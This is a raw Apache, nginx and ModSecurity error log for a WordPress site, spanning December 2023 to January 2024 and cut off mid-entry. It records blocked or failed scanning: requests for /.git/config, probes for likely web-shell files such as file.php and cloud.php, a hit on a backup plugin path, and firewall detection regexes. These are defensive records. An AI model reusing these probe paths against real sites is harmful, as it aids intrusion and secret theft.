investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Dec 23 22:17:40.654922 2023] [authz_core:error] [pid 4947:tid 140698162493184] [client 139.144.96.150:50452] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/12/23 22:17:46 [error] 4876#4876: *397624 access forbidden by rule, client: 139.144.96.150, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Dec 24 15:57:56.960961 2023] [autoindex:error] [pid 8820:tid 140280661530368] [client 20.150.219.223:42392] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Dec 26 11:01:53.513584 2023] [:error] [pid 3563:tid 139753420691200] [client 154.6.94.11:57072] [client 154.6.94.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZYr48RCGM7f4PTyVJw8UqwAAANI"] [Tue Dec 26 11:01:53.542189 2023] [:error] [pid 2919:tid 139753529796352] [client 154.6.94.11:57074] [client 154.6.94.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZYr48aRmzgTwknsIGX-saQAAAEU"] [Tue Dec 26 11:01:53.559209 2023] [:error] [pid 2919:tid 139753496225536] [client 154.6.94.11:57076] [client 154.6.94.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZYr48aRmzgTwknsIGX-sagAAAEk"] [Tue Dec 26 11:01:54.575506 2023] [:error] [pid 2920:tid 139753471047424] [client 154.6.94.11:57082] [client 154.6.94.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZYr48rhnLX_axgxkoPdE0wAAAIw"] [Tue Dec 26 11:01:54.613623 2023] [:error] [pid 2920:tid 139753429083904] [client 154.6.94.11:57084] [client 154.6.94.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZYr48rhnLX_axgxkoPdE1AAAAJE"] [Tue Dec 26 11:01:55.640626 2023] [:error] [pid 3563:tid 139753615394560] [client 154.6.94.11:57086] [client 154.6.94.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZYr48xCGM7f4PTyVJw8UrAAAAMM"] [Tue Dec 26 11:01:55.652265 2023] [:error] [pid 2919:tid 139753387120384] [client 154.6.94.11:57088] [client 154.6.94.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZYr486RmzgTwknsIGX-sbAAAAFY"] [Tue Dec 26 11:01:55.663901 2023] [:error] [pid 2918:tid 139753615394560] [client 154.6.94.11:57090] [client 154.6.94.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZYr489-ij7l7c3veoPFCXAAAAAM"] [Tue Dec 26 11:01:55.674983 2023] [:error] [pid 2919:tid 139753437476608] [client 154.6.94.11:57092] [client 154.6.94.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZYr486RmzgTwknsIGX-sbQAAAFA"] [Tue Dec 26 11:01:56.709393 2023] [:error] [pid 2918:tid 139753496225536] [client 154.6.94.11:57094] [client 154.6.94.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZYr49N-ij7l7c3veoPFCXQAAAAk"] [Tue Dec 26 11:01:56.723267 2023] [:error] [pid 2919:tid 139753403905792] [client 154.6.94.11:57096] [client 154.6.94.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZYr49KRmzgTwknsIGX-sbgAAAFQ"] [Tue Dec 26 11:01:57.753636 2023] [:error] [pid 3563:tid 139753370334976] [client 154.6.94.11:57098] [client 154.6.94.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZYr49RCGM7f4PTyVJw8UrQAAANg"] [Tue Dec 26 17:35:43.199020 2023] [:error] [pid 2919:tid 139753412298496] [client 31.22.7.58:35378] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php, referer: http://simplesite.com [Tue Dec 26 22:43:36.500299 2023] [autoindex:error] [pid 3563:tid 139753445869312] [client 20.38.40.151:44930] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Dec 27 23:11:55.781143 2023] [autoindex:error] [pid 24274:tid 139685892388608] [client 80.91.223.149:48742] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com//wp-admin/css/colors/coffee/index.php [Thu Dec 28 06:23:23.144632 2023] [:error] [pid 24274:tid 139685925959424] [client 192.185.2.82:51086] PHP Fatal error: Uncaught Error: Call to undefined function __() in /home/investig/public_html/wp-admin/includes/file.php:16, referer: http://simplesite.com [Thu Dec 28 06:23:23.145064 2023] [:error] [pid 24274:tid 139685925959424] [client 192.185.2.82:51086] Stack trace:, referer: http://simplesite.com [Thu Dec 28 06:23:23.145096 2023] [:error] [pid 24274:tid 139685925959424] [client 192.185.2.82:51086] #0 {main}, referer: http://simplesite.com [Thu Dec 28 06:23:23.145161 2023] [:error] [pid 24274:tid 139685925959424] [client 192.185.2.82:51086] thrown in /home/investig/public_html/wp-admin/includes/file.php on line 16, referer: http://simplesite.com [Thu Dec 28 12:18:51.278362 2023] [autoindex:error] [pid 2480:tid 139890272450304] [client 200.201.204.2:53376] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Dec 29 20:28:44.107150 2023] [:error] [pid 32679:tid 140034288105216] [client 201.230.170.102:35262] [client 201.230.170.102] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/2020/05/20/taller-de-tesis/"] [unique_id "ZY9yTJAetpEFEQ8Kd8Yq2AAAAMQ"] [Sat Dec 30 02:54:38.621180 2023] [:error] [pid 32679:tid 140034279712512] [client 198.57.247.130:41586] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php, referer: http://simplesite.com [Sat Dec 30 02:55:09.113148 2023] [:error] [pid 32044:tid 140034321676032] [client 198.57.247.130:41590] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php, referer: http://simplesite.com [Sat Dec 30 06:02:16.854778 2023] [:error] [pid 18709:tid 140173933225728] [client 141.94.207.53:46344] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php, referer: http://simplesite.com [Sat Dec 30 09:39:54.943144 2023] [:error] [pid 18707:tid 140174148200192] [client 216.73.160.107:50352] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwenty/404.php:10 [Sat Dec 30 09:39:54.943219 2023] [:error] [pid 18707:tid 140174148200192] [client 216.73.160.107:50352] Stack trace: [Sat Dec 30 09:39:54.943234 2023] [:error] [pid 18707:tid 140174148200192] [client 216.73.160.107:50352] #0 {main} [Sat Dec 30 09:39:54.943314 2023] [:error] [pid 18707:tid 140174148200192] [client 216.73.160.107:50352] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/404.php on line 10 [Sat Dec 30 09:40:05.296367 2023] [autoindex:error] [pid 18707:tid 140173975189248] [client 216.73.160.107:50368] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com//wp-includes/js/tinymce/skins/lightgray/fonts/index.php [Sat Dec 30 13:15:25.533238 2023] [:error] [pid 19321:tid 140173916440320] [client 179.43.159.200:54294] [client 179.43.159.200] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/backup-backup/includes/backup-heart.php"] [unique_id "ZZBePeAOTY0pwmVoxVVrLAAAANM"] 2024/01/02 00:42:36 [error] 30499#30499: *63594 access forbidden by rule, client: 159.65.58.104, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/02 00:42:36 [error] 30499#30499: *63595 access forbidden by rule, client: 143.110.156.182, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/02 00:42:36 [error] 30499#30499: *63608 access forbidden by rule, client: 207.154.240.169, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/02 00:42:38 [error] 30498#30498: *63684 access forbidden by rule, client: 139.144.150.45, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/02 00:42:39 [error] 30498#30498: *63711 access forbidden by rule, client: 164.92.192.25, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/02 00:42:40 [error] 30499#30499: *63733 access forbidden by rule, client: 164.90.205.35, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Tue Jan 02 01:14:35.289136 2024] [autoindex:error] [pid 30540:tid 139725855766272] [client 20.198.73.126:43662] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jan 02 03:17:18.669708 2024] [ssl:warn] [pid 20446:tid 140395791574912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 02 03:17:26.871132 2024] [ssl:warn] [pid 20448:tid 140395791574912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 02 03:17:27.399973 2024] [ssl:warn] [pid 20448:tid 140395791574912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 02 03:17:29.398748 2024] [ssl:warn] [pid 20448:tid 140395791574912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 02 03:17:31.671749 2024] [ssl:warn] [pid 20952:tid 140414415796096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 02 03:17:39.852863 2024] [ssl:warn] [pid 20956:tid 140414415796096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 02 03:17:40.493181 2024] [ssl:warn] [pid 20956:tid 140414415796096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 03 00:05:09.970857 2024] [autoindex:error] [pid 21322:tid 140413973206784] [client 217.197.117.40:38822] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Wed Jan 03 03:23:25.074241 2024] [ssl:warn] [pid 15045:tid 140340757047168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 03 03:23:33.485752 2024] [ssl:warn] [pid 15048:tid 140340757047168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 03 03:23:33.988013 2024] [ssl:warn] [pid 15048:tid 140340757047168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 03 03:23:36.031743 2024] [ssl:warn] [pid 15048:tid 140340757047168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 03 03:23:38.302300 2024] [ssl:warn] [pid 15465:tid 139858101593984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 03 03:23:50.515619 2024] [ssl:warn] [pid 15470:tid 139858101593984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 03 15:45:47.067998 2024] [autoindex:error] [pid 15792:tid 139857665902336] [client 173.224.119.245:55578] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/01/04 00:36:14 [error] 15445#15445: *92061 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php" failed (2: No such file or directory), client: 20.219.151.88, server: cpanel.investigacionperu.com, request: "GET /.well-known/pki-validation/cloud.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/04 00:36:14 [error] 15445#15445: *92061 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php" failed (2: No such file or directory), client: 20.219.151.88, server: cpanel.investigacionperu.com, request: "GET /.well-known/acme-challenge/cloud.php HTTP/1.1", host: "cpanel.investigacionperu.com" [Thu Jan 04 02:10:25.065596 2024] [:error] [pid 15492:tid 139857707865856] [client 41.216.188.162:38366] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php, referer: www.google.com [Thu Jan 04 02:10:30.676652 2024] [:error] [pid 15792:tid 139857716258560] [client 41.216.188.162:38410] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php, referer: www.google.com [Thu Jan 04 03:10:16.328861 2024] [ssl:warn] [pid 21352:tid 140567616407424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 04 03:10:20.551553 2024] [ssl:warn] [pid 21353:tid 140567616407424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 04 03:10:21.093934 2024] [ssl:warn] [pid 21353:tid 140567616407424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 04 03:10:22.736276 2024] [ssl:warn] [pid 21353:tid 140567616407424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 04 03:10:25.068443 2024] [ssl:warn] [pid 21799:tid 140115617314688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 04 03:10:38.341724 2024] [ssl:warn] [pid 21802:tid 140115617314688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 04 10:46:43.507297 2024] [autoindex:error] [pid 22448:tid 140115401000704] [client 178.254.58.82:50728] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/PHPMailer/index.php 2024/01/04 18:34:32 [error] 21686#21686: *106545 access forbidden by rule, client: 34.201.138.70, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/04 18:43:52 [error] 21685#21685: *106670 access forbidden by rule, client: 34.201.138.70, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/04 21:08:18 [error] 21685#21685: *107890 access forbidden by rule, client: 34.201.138.70, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/04 21:17:52 [error] 21685#21685: *107950 access forbidden by rule, client: 34.201.138.70, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Fri Jan 05 00:10:22.118522 2024] [:error] [pid 2082:tid 140115204577024] [client 41.216.188.162:35178] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php, referer: www.google.com [Fri Jan 05 00:10:29.528288 2024] [:error] [pid 1863:tid 140115271718656] [client 41.216.188.162:35208] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php, referer: www.google.com 2024/01/05 00:21:53 [error] 21686#21686: *109190 access forbidden by rule, client: 34.201.138.70, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/05 00:29:46 [error] 21686#21686: *109237 access forbidden by rule, client: 34.201.138.70, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Fri Jan 05 00:42:16.448004 2024] [ssl:warn] [pid 21802:tid 140115617314688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 05 03:17:24.151753 